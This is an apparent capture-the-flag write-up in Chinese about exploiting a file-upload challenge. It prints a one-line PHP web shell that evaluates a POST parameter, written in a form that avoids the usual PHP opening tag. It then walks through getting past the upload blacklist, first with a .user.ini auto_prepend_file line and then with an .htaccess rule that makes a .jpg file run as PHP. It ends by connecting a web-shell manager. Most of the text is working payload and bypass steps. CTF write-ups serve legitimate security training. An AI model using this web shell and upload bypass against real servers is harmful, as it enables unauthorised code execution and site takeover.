考点:.htaccess文件上传
<script language="pHp">@eval($_POST['a'])</script>
上传类型,先上传一个图片类型的马子
发现检测了上传内容,换个一句话(不带<?php的)
<script language="pHp">@eval($_POST['a'])</script>
发现可以成功上传,紧接着换成php 发现对文件名也有检测
试试不存在的文件名,以此来判断是否白名单限制
可以上传,以此推断是黑名单上传,这次我们使用.user.ini
auto_prepend_file=11.jpg
发现没有解析,为此我们继续换 .htaccess上传
<FilesMatch "11.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
返回403说明解析成功。
再上传一个文件名为11.jpg的文件名
成功解析。上蚁剑